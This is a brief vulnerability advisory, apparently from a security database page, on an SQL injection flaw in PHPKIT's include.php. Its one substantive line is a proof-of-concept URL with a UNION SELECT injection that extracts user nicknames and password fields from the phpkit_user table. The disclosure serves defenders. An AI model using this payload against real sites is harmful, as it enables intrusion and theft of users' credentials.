|
PHPKIT Include.PHP SQL Injection Vulnerability
This issue can be exploited through a web client. The following proof of concept is available: http://www.example.com/phpkit/include.php?path=content/news.php&contentid=-24'%20union%20select%201,2,3,user_status,5,user_nick,user_pw,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20phpkit_user%20/* |
|
|
Privacy Statement |